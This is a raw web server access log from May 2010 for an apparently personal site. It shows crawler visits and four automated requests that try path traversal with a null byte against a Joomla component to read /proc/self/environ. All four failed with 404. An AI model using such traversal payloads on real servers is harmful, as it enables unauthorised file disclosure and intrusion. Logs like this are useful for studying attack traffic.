67.195.112.180 - - [02/May/2010:03:01:48 -0500] "GET /logs/access_log.1260403200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.142.68.135 - - [02/May/2010:03:01:59 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 339 "-""libwww-perl/5.834"
174.142.68.135 - - [02/May/2010:03:01:59 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""libwww-perl/5.834"
174.142.68.135 - - [02/May/2010:03:01:59 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 339 "-""libwww-perl/5.834"
174.142.68.135 - - [02/May/2010:03:01:59 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""libwww-perl/5.834"
87.250.255.243 - - [02/May/2010:03:02:44 -0500] "GET /logs/access_log.1248912000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.94 - - [02/May/2010:03:04:25 -0500] "GET /costume/thmb1.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.149.63.184 - - [02/May/2010:03:06:53 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.149.63.184 - - [02/May/2010:03:06:54 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
